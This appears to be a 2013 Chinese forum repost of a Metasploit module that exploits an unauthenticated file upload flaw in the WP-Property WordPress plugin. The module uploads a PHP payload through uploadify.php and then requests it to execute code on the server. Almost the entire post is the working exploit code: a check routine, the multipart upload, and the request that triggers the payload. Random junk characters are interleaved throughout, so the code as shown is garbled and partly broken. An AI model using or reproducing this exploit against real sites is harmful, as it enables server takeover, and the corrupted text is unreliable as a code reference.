WordPress WP-Property PHP 文件上传漏洞
( k; y4 s# o C4 A& v
0 N H. {1 X" u: ]% X& b* h ## # This file is part of the Metasploit Framework and may be subject to
6 n3 I" @4 I& H+ s: g" m$ c3 ^" |9 r6 s( k- R
# redistribution and commercial restrictions. Please see the Metasploit& u9 u! X. T6 K, D2 p
0 {" v7 \% N1 v6 d: E. Y
# Framework web site for more information on licensing and terms of use., ~7 l' [! X9 R& ]/ V$ H
7 O2 ?* W+ ?' {. D% k" S* ~# http://metasploit.com/framework/ ##
9 [3 B9 O7 K: K1 i. ^0 D$ C3 j& i+ x; o8 G4 i
+ u/ i4 e0 p- h' @2 K$ f, O
% e# I% l( `* c2 F: k1 D. T, m" r
5 }! {2 k% f+ ]0 M2 _ Y1 j" F8 @. p: I
require 'msf/core'
2 \( w; n5 S/ }. ]6 e2 Prequire 'msf/core/exploit/php_exe'
+ _$ B0 |8 @: ]7 N8 A- ~" _, c" O( ?$ ?9 J4 e5 m( g
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
, M4 j) _4 _0 z'Description' => %q{( O, V* _# G& N. d1 v
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>& K5 L3 B5 J6 Q3 c) T
[
D0 `' o( P- X, h( b; g" f, n'Sammy FORGIT', # initial discovery
S* l9 P% C% N' P9 P* b* h2 ['James Fitts <fitts.james[at]gmail.com>' # metasploit module
$ {! X% ]6 u- {' ]],) y3 [2 w; x: p7 W
'License' => MSF_LICENSE, U( |" M$ t8 V: f0 }2 f. b7 i
'References' =>3 k" N6 \- Q; i* z$ d0 G4 X7 j' P
[ P! L3 L: B A
[ 'OSVDB', '82656' ],
0 y3 q7 P, _, r. b4 h' [[ 'BID', '53787' ],! a* J0 e7 z9 b
[ 'EDB', '18987'],* G6 g0 T2 F+ Q9 b* a1 ^
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
1 G4 n+ t) C) `3 b5 [8 S" u( V],+ |- S7 H0 w q
'Payload' =>! N' a3 ?. Y# v# U0 P
{
3 n$ p# I9 L5 i- z) l1 ?'BadChars' => "\x00",
9 r4 l. c H- k3 H7 h},0 P( D) W; Y. l3 i& j$ I
'Platform' => 'php',/ a) t# }- T$ Q" {7 R7 ~: U" ?
'Arch' => ARCH_PHP,: ~4 L/ s3 ?$ |8 `8 w
'Targets' =>
- L) Y# f( }+ H+ k[
# q& w" y% c( O/ B7 x/ Q" o. S[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ]," B4 L* N/ A; w* ^* X# B8 N
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]- }; W4 R+ d& |5 U6 b/ T
],
$ ~7 p9 D3 M% @7 f$ @6 R'DefaultTarget' => 0,
( R- a- ^( P0 ~6 D'DisclosureDate' => 'Mar 26 2012'))& ~6 y- P: n3 E' T* R# D- f6 }& l1 i
; g \0 v% J7 Z, |3 D
register_options(% G8 F& X0 r3 m( f* r" d4 ?. F& o+ {
[
! X. b& y' w8 H! |. j* y8 H: w+ n& aOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
" T$ }+ p, Z/ J( R], self.class)
4 X/ u( b' E: ], s/ i- Hend- A. O: @3 S" j& ?6 V
6 E) l5 C6 l- H2 m, i wdef check
* q9 }" A# O- Q/ E( A/ N/ [uri = target_uri.path4 l2 x; z0 L6 z7 o3 U
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
$ ?6 e1 A, {4 a; I'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"! g$ h! T ^/ g( V- ~0 p! D
})% ~! H" C2 t& E C
4 T9 H' K- q4 ~. @1 S* s9 Dif not res or res.code != 200. g9 E2 ]' u9 u. \9 D" g$ P' e
return Exploit::CheckCode::Unknown
6 ~ U! { m5 t5 W& A b& i8 zend
0 }1 ]1 p: W# a* L7 q; i3 p! t# I3 j1 X5 w- G. c2 _" b* Y: _ O
return Exploit::CheckCode::Appears
% f5 m! Y; I& Send+ l$ j1 X; o. V3 e( @0 S) H2 R7 D @
) c/ a6 W; v7 v. V7 d; s
def exploit) A! W. t: A: w& `
uri = target_uri.path
6 y: N9 z {+ q B. U& f- Turi << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)( K! `, b* z/ b' k3 S* r
! b1 Y1 p8 i: y/ [- ?0 f
data = Rex::MIME::Message.new
. U- G9 x+ ], _# C+ }& |% p" sdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
8 q/ R; k5 V0 {% ?9 U+ bdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
5 X6 \! x# ~9 q* Zpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
# l! B& I" i) {: o
7 F. Z) ?1 `+ P1 s; Kprint_status("#{peer} - Uploading payload #{@payload_name}")& u7 t" j( p7 f1 e2 l/ @
res = send_request_cgi({
4 P; b; v, V3 k Z'method' => 'POST',3 s) o @$ W& C. X( c6 T
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",, H5 [1 j% O- z+ j# w% ?
'ctype' => "multipart/form-data; boundary=#{data.bound}",
* ^& {0 n( \+ W'data' => post_data
1 h* R; B* }' p. t# W$ U6 ?' x6 }( _})
+ {( \+ {3 I- p9 l1 |. o4 O
5 x0 \+ \* q: x- ?, ^" a- @9 [# qif not res or res.code != 200 or res.body !~ /#{@payload_name}/
# ?0 U/ F( M% O @& d0 s- {fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
1 V0 P) D/ s9 t' `6 Nend: I' a9 w1 Z6 e1 W1 t- `
9 O! e- e: }2 ?0 \upload_uri = res.body
+ z+ D; l1 B" \4 Y% Y1 V; t# J+ }% F: r/ N: ~' J
print_status("#{peer} - Executing payload #{@payload_name}")
% z9 M1 M/ Z. B) R) @res = send_request_raw({7 ]/ P) [1 S8 X: r8 O9 j
'uri' => upload_uri,
6 D' ?( s( Z4 @7 l) C, t& z4 f'method' => 'GET'2 W0 v8 T9 w3 z; z& `
})* W' p7 y4 g8 O
end$ |$ y6 E) ^. {7 Y, g
end) \; A6 Z8 ~$ p& t. M: R* L
' X, f$ V; n" m3 v不要问我这写的是什么 怎么利用 我是说msf.
+ Q; W) b. s$ i v
! o0 o* u' k) W) c |
发表于 2013-1-4 19:51:30
收藏
支持
反对